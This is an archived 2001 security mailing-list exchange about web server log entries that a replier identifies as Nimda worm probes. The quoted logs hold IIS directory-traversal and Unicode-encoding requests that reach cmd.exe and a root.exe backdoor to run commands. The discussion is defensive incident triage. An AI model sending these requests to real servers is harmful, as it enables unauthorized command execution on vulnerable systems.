It has a reverse lookup (64.148.216.72) but no forward lookup. That IP block is indeed owned by Internetconnect. Looks like simple Nimdaness to me. -Mike At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote: >Hi, > >I just got this. Is it just me, or is this address spoofed? >Can anyone resolve dsl-6414821672.internetconnect.net? > >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET >/scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-" >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 302 279 "-" "-" >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 302 279 "-" "-" >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" >dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-" > > > >-- >Emre Yildirim <emreat_private> >GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com) > > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus ARIS analyzer service. >For more information on this free incident handling, management and >tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 14:31:24 PDT